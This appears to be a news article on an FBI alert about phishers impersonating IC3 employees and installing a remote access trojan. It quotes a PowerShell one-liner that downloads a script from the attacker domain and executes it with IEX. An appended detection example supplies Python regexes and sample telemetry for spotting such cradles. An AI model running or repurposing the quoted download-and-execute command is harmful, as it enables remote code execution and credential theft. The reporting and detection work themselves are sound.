FBI Warns of Scammers Impersonating IC3 Employees to Defraud Individuals


The Federal Bureau of Investigation (FBI) has issued an urgent warning about a sophisticated phishing campaign where cybercriminals impersonate Internet Crime Complaint Center (IC3) employees to defraud individuals.

This new threat emerged in early April 2025, targeting victims through convincing spoofed emails appearing to come from legitimate IC3 domains.

Victims receive official-looking communications claiming to offer assistance with previous fraud complaints or promising financial recovery services.


The malicious actors deploy social engineering tactics, establishing trust through knowledge of publicly available information and previously reported incidents.

They ask victims to install “verification software” that purportedly secures communications but actually deploys a Remote Access Trojan (RAT).

Initial analysis indicates the attackers primarily target individuals who have previously filed complaints with the IC3, suggesting a possible data breach or public records mining operation.

IC3 analysts identified a particularly concerning aspect of this campaign: the malware employs sophisticated evasion techniques to bypass standard antivirus detection.

“The threat actors have implemented multi-stage encryption and fileless execution methods that make traditional detection extremely difficult,” noted Senior IC3 Cyber Analyst Maria Chen.

The infection has affected over 230 individuals nationwide, with financial losses exceeding $1.2 million in the past three weeks.

Infection Mechanism Analysis

The malware’s primary infection vector relies on convincing victims to download and execute a seemingly benign PDF attachment.

When opened, the document displays legitimate-looking FBI branding while silently executing PowerShell commands in the background:

$c = New-Object System.Net.WebClient
$c.DownloadString('https://ic3-secure-portal.net/verify.txt') | IEX

This command fetches and executes additional code from the attacker’s server, establishing persistence through scheduled tasks and registry modifications while exfiltrating banking credentials and authentication tokens.
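As an added defensive example (not part of the FBI alert or this article), the Python below flags the two behaviours described above in constructed sample telemetry: a PowerShell script block that fetches remote content and evaluates it with IEX, and a PDF reader process spawning PowerShell. The reader process names, the example.invalid domain and the event shapes are assumptions.

```python
import re
from typing import Dict, List

# Added detection example, not code from the advisory. All sample events are constructed.
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient",
    re.IGNORECASE,
)
EXEC_RE = re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE)
# Assumed PDF reader image names; extend to match the readers deployed in your environment.
READER_PARENTS = {"acrord32.exe", "acrobat.exe", "foxitreader.exe", "sumatrapdf.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

def is_download_cradle(script_block: str) -> bool:
    """True when one script block both fetches remote content and evaluates it."""
    return bool(DOWNLOAD_RE.search(script_block) and EXEC_RE.search(script_block))

def is_reader_spawning_powershell(parent: str, image: str) -> bool:
    """True when a PDF reader process launches PowerShell (document-driven execution)."""
    return parent.lower() in READER_PARENTS and image.lower() in POWERSHELL_IMAGES

def scan(script_blocks: List[str], process_events: List[dict]) -> Dict[str, List[int]]:
    """Return indices of suspicious script blocks and process-creation events."""
    hits: Dict[str, List[int]] = {"cradle": [], "reader_spawn": []}
    for i, block in enumerate(script_blocks):
        if is_download_cradle(block):
            hits["cradle"].append(i)
    for i, ev in enumerate(process_events):
        if is_reader_spawning_powershell(ev["parent"], ev["image"]):
            hits["reader_spawn"].append(i)
    return hits

# Constructed samples: Event ID 4104-style script blocks and Sysmon-style process events.
SCRIPT_BLOCKS = [
    "$c = New-Object System.Net.WebClient\n$c.DownloadString('https://example.invalid/verify.txt') | IEX",
    "Get-ChildItem C:\\Users | Select-Object Name",
    "iwr https://example.invalid/x.ps1 -UseBasicParsing | iex",
    "Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv",  # download only
]
PROCESS_EVENTS = [
    {"parent": "AcroRd32.exe", "image": "powershell.exe"},
    {"parent": "explorer.exe", "image": "powershell.exe"},
    {"parent": "AcroRd32.exe", "image": "AcroCEF.exe"},
]

if __name__ == "__main__":
    print(scan(SCRIPT_BLOCKS, PROCESS_EVENTS))  # {'cradle': [0, 2], 'reader_spawn': [0]}
```

A plain download (index 3) is not flagged on its own; the cradle rule requires fetch and evaluate in the same block, which keeps ordinary Invoke-WebRequest use out of the alert stream.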
